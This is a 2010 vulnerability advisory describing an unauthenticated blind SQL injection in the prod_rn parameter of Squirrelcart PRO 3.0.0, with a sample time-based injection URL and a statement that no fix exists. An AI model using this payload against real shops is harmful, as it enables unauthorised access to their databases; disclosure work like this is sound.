1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
Squirrelcart PRO 3.0.0 Blind SQL Injection Vulnerability NameSquirrelcart PRO Vendorhttp://www.squirrelcart.com Versions Affected 3.0.0 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-10-21 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION ________________________ Squirrelcart PROisacommercialandusedPHP/MySQL e-commerce system. I tested only the demo versions.Other versions could be vulnerable. I obtained the demo's version value fromthe staff. II. DESCRIPTION _______________ A parameter is not properly sanitisedbeforebeing used in a SQL query. III. ANALYSIS _____________ Summary: A) Blind SQL Injection A) Blind SQL Injection ______________________ The parameters prod_rn in index.php whenadd_to_cartis set to a positive value is not properly sanitisedbefore beingusedin aSQLquery. Thiscanbe exploited to manipulateSQLqueries by injecting arbitrary SQL code. Thisvulnerabilitydoesn'trequiresto belogged in. Successful exploitation requires thatthefirst part of the injection (in the sample code it is 271)mustbea valid product number (just see the products list). IV. SAMPLE CODE _______________ A) Blind SQL Injection http://site/path/index.php?add_to_cart=10&prod_rn=271 AND (SELECT(IF(0x41=0x41, BENCHMARK(9999999999,NULL),NULL))) V. FIX ______ No fix. |